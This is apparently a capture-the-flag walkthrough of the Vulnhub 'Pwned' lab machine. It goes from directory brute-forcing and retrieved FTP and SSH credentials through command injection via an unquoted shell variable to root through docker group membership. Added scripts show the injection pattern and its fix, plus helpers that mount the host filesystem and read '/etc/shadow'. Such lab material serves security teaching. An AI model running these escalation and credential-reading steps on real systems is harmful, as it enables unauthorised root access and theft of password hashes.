Vulnhub-pwned

0x01 Information Gathering

NMAP

$ nmap -T5 -p- -sV -sC 192.168.56.3
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-21 17:21 CST
Nmap scan report for 192.168.56.3
Host is up (0.0014s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 fe:cd:90:19:74:91:ae:f5:64:a8:a5:e8:6f:6e:ef:7e (RSA)
| 256 81:32:93:bd:ed:9b:e7:98:af:25:06:79:5f:de:91:5d (ECDSA)
|_ 256 dd:72:74:5d:4d:2d:a3:62:3e:81:af:09:51:e0:14:4a (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Pwned....!!
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Attack surface analysis

  • Port 21: the default scripts (-sC) did not report anonymous login on vsftpd, so there is no point trying it by hand.
  • Port 22: ssh, with no credentials or key there is nothing to do but brute force.
  • Port 80: since 21 and 22 give nothing, the clues have to come from HTTP.

HTTP

$ gobuster dir -u http://192.168.56.3/ -w /usr/share/dirbuster/directory-list-2.3-medium.txt    
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://192.168.56.3/
[+] Threads: 10
[+] Wordlist: /usr/share/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2020/07/21 17:22:44 Starting gobuster
===============================================================
/nothing (Status: 301)
/server-status (Status: 403)
/hidden_text (Status: 301)
===============================================================
2020/07/21 17:23:29 Finished
===============================================================

/nothing really has nothing in it; the author wasn't lying.
/hidden_text contains a file secret.dic. Downloading it shows a list of paths, so it is presumably a directory wordlist meant to be fed back into the brute force.

$ gobuster dir -u http://192.168.56.3/ -w ./secret.dic                                      
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://192.168.56.3/
[+] Threads: 10
[+] Wordlist: ./secret.dic
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2020/07/21 17:24:22 Starting gobuster
===============================================================
/pwned.vuln (Status: 301)
===============================================================
2020/07/21 17:24:22 Finished
===============================================================

Visiting this path:

Aha, and there are the FTP credentials.
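The two gobuster runs above are one procedure: probe with a generic list, find a wordlist the target left behind, probe again with that. The following is an added example (not part of the original write-up, and not gobuster's own code) that does the same status-code-filtered probe in plain sh, reading words from stdin so a discovered wordlist can be piped straight in. http_status is real (curl); demo_status is a constructed stand-in that answers like the target did, so the function can be exercised offline.

```shell
#!/bin/sh
# Added example: wordlist-driven directory probe with gobuster's default
# status filter (200,204,301,302,307,401,403).
#
# usage: probe_paths BASE_URL [STATUS_FN] < wordlist
#   STATUS_FN defaults to http_status (live HTTP via curl).
#   demo_status is a constructed fake modelled on the results above.

http_status() {
    # Print only the HTTP status code for URL $1 ("000" if unreachable).
    curl -s -o /dev/null -w '%{http_code}' --max-time 10 "$1"
}

demo_status() {
    # Constructed responses, not captured from the box: they mirror the
    # three gobuster hits and the /server-status 403 shown above.
    case "$1" in
        */nothing|*/hidden_text|*/pwned.vuln) echo 301 ;;
        */server-status)                        echo 403 ;;
        *)                                      echo 404 ;;
    esac
}

probe_paths() {
    base=${1%/}                 # drop trailing slash; we build base/word
    status_fn=${2:-http_status}
    while IFS= read -r word || [ -n "$word" ]; do
        case "$word" in ''|'#'*) continue ;; esac   # skip blanks/comments
        word=${word#/}
        code=$("$status_fn" "$base/$word")
        case "$code" in
            200|204|301|302|307|401|403)
                printf '/%s (Status: %s)\n' "$word" "$code" ;;
        esac
    done
}

# Chaining, as in the write-up (live runs, need the target reachable):
#   probe_paths http://192.168.56.3 < /usr/share/dirbuster/directory-list-2.3-medium.txt
#   curl -s http://192.168.56.3/hidden_text/secret.dic | probe_paths http://192.168.56.3
```

The second live command is the interesting one: anything that looks like a wordlist on a target (a .dic, a .txt full of paths, a robots.txt) is worth feeding back in, because the author almost certainly wrote it for exactly that use.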

FTP

$ ftp 192.168.56.3
Connected to 192.168.56.3.
220 (vsFTPd 3.0.3)
Name (192.168.56.3:vkk): ftpuser
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
drwxr-xr-x 2 0 0 4096 Jul 10 12:47 share

ftp> cd share
250 Directory successfully changed.
ftp> ls
-rw-r--r-- 1 0 0 2602 Jul 09 15:05 id_rsa
-rw-r--r-- 1 0 0 75 Jul 09 17:41 note.txt
226 Directory send OK.
ftp> get id_rsa

ftp> get note.txt

ftp> quit
221 Goodbye.

Both files downloaded here are likely to be needed later on.

0x02 Exploitation

After downloading the SSH private key, give it 600 (or 400) permissions, since ssh refuses to use a key that other users can read. We don't know which account the key belongs to, but note.txt mentions an English name, so try that name directly as the username.

$ chmod 600 id_rsa
$ cat note.txt
Wow you are here

ariana won't happy about this note

sorry ariana :(
$ ssh -i id_rsa ariana@192.168.56.3

Login successful.

Checking file permissions turned up nothing that could be tampered with.

The line to focus on here is:

$msg 2> /dev/null

This expands the variable msg unquoted and runs the result as a command line (word-split, so arguments work too), with that command's stderr sent to /dev/null. Whatever text ends up in msg is therefore executed, and the redirection only hides any error messages.

I only noticed this later, after discussing it with an expert in the group; at the start I had blindly typed whoami, got a result, and never paid attention to this line (thanks to dis_ for the explanation).
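The write-up quotes only that one line, not the whole script, so the following is an added example rather than the box's own code: a minimal handler with the flawed pattern next to a fixed one. The function names and the test inputs are mine.

```shell
#!/bin/sh
# Added example (hypothetical handler names): command injection through an
# unquoted variable expansion, and the fix.

# Flawed. $msg is expanded unquoted, split into words and executed, so a
# "message" of  whoami  or  /bin/bash -p  simply runs. 2> /dev/null only
# discards the evidence. Quoting ("$msg") does NOT fix this: it would then
# try to execute a program literally named "echo pwned" instead.
vuln_handler() {
    msg=$1
    $msg 2> /dev/null
}

# Fixed. The input is data, so print it; never expand it into a command
# position. printf '%s' emits the string verbatim, whatever it contains
# (spaces, ';', $( ), backticks).
safe_handler() {
    msg=$1
    printf '%s\n' "$msg"
}

# Typical prompt loop for either handler:
#   printf 'Message: '; read -r msg; vuln_handler "$msg"
# If such a script is run with elevated rights (sudo, a setuid wrapper), the
# injected command inherits those rights, which is what makes the pattern a
# privilege-escalation primitive rather than a curiosity.
```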

0x03 Privilege Escalation

The user is a member of the docker group, so we escalate through the docker group directly. The Docker daemon runs as root, and group members may talk to its socket, so they can start a container with the host's / mounted inside it and chroot into that mount as root.

docker run -v /:/mnt --rm -it alpine chroot /mnt sh
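As an added example (not from the write-up), here are the checks that precede that one-liner and a non-interactive variant of it. members_of and in_group parse /etc/group-formatted text from stdin, which is also what a defender auditing a host wants; the sample group file in the usage note is constructed.

```shell
#!/bin/sh
# Added example: who can reach the Docker daemon, and the escalation itself.

# members_of GROUP: print members of GROUP from /etc/group-format input.
members_of() {
    awk -F: -v g="$1" '$1 == g && $4 != "" {
        n = split($4, u, ","); for (i = 1; i <= n; i++) print u[i] }'
}

# in_group USER GROUP: succeed if USER is listed in GROUP (same input).
in_group() {
    members_of "$2" | grep -qx "$1"
}

# docker_sock_usable: succeed if this process can write to the daemon
# socket, i.e. the escalation below will work without sudo.
docker_sock_usable() {
    [ -w /var/run/docker.sock ]
}

# Interactive root shell on the host (the write-up's command; needs a tty).
docker_root_shell() {
    docker run -v /:/mnt --rm -it alpine chroot /mnt sh
}

# Same mount, one command, no tty: docker_root_cmd 'cat /etc/shadow'
docker_root_cmd() {
    docker run -v /:/mnt --rm alpine chroot /mnt sh -c "$*"
}

# On the box:
#   in_group "$(id -un)" docker < /etc/group && docker_sock_usable && docker_root_shell
```

Two caveats for real runs. `docker run alpine` pulls the image if it is not already present, so on a box without internet check `docker images` and use whatever image is there; any image with a shell works because the shell that matters is the host's, reached through the chroot. And `-it` needs a terminal, so from a non-interactive foothold use the `docker_root_cmd` form instead.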